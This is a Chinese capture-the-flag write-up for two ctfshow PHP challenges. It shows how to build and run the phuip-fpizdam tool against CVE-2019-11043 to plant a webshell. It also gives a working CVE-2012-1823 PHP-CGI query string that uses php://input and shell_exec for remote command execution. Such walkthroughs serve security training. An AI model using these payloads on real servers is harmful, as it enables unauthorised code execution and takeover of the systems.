ctfshow phpCVE web311&web313

web311

这道题是一个版本漏洞
CVE-2019-11043

这个漏洞工具的使用必须要有go环境哦

php 复制代码
//创建工作空间
mkdir $HOME/go  
如果失败就rm -rf ~/go
//编辑 ~/.bash_profile 文件
vim ~/.bash_profile
//在最后一行添加下面这句。$HOME/go 为你工作空间的路径,你也可以换成你喜欢的路径
export GOPATH=$HOME/go
//保存退出后source一下(vim 的使用方法可以自己搜索一下)
source ~/.bash_profile
// 创建并进入你的第一个工程目录
mkdir -p $GOPATH/src/test && cd $GOPATH/src/test
//下载安装
git clone https://github.com/neex/phuip-fpizdam.git phuip-fpizdam
cd phuip-fpizdam
go get -v && go build
php 复制代码
如果报错如上图,执行命令切换为国内代理:
go env -w GOPROXY=https://goproxy.cn
php 复制代码
./phuip-fpizdam url/index.php 利用工具写入shell,然后密码是a并且是GET传参

web313

CVE-2012-1823

用到的cgi模式下的参数

-s 显示文件源码

-d 指定配置项

然后可以使用-d来指定 auto_prepend_file来制造任意文件漏洞,执行任意代码

php 复制代码
index.php?-d+allow_url_include%3don+-d+auto_prepend_file%3dphp%3a//input
php:input接受输入流
POST:
<?php echo shell_exec("命令");
php 复制代码
<?php
error_reporting(0);
//flag in my disk somewhere,go on!      意思是在我的磁盘somewhere 里面
echo 'where is flag?';
?>
相关推荐
说私域1 小时前
全民电商时代下的链动2+1模式与S2B2C商城小程序:社交裂变与供应链协同的营销革命
开发语言·人工智能·小程序·php·流量运营
catchadmin2 小时前
2026 年 PHP 函数式编程 优势与实际应用
数据库·php
2301_810970392 小时前
第一次渗透作业
web安全·php
DARLING Zero two♡2 小时前
【计算机网络】简学深悟启示录:序列化&&反序列化
开发语言·计算机网络·php
100编程朱老师2 小时前
fping命令详解
开发语言·php
小小代码狗3 小时前
【无标题】
网络·sql·php
Wcy30765190663 小时前
文件包含漏洞及PHP伪协议
开发语言·php
运筹vivo@3 小时前
攻防世界:Web_php_include
前端·web安全·php
jllllyuz3 小时前
ANPC三电平逆变器损耗计算的MATLAB实现
开发语言·matlab·php
w***76554 小时前
PHP vs Python:如何选择?
开发语言·python·php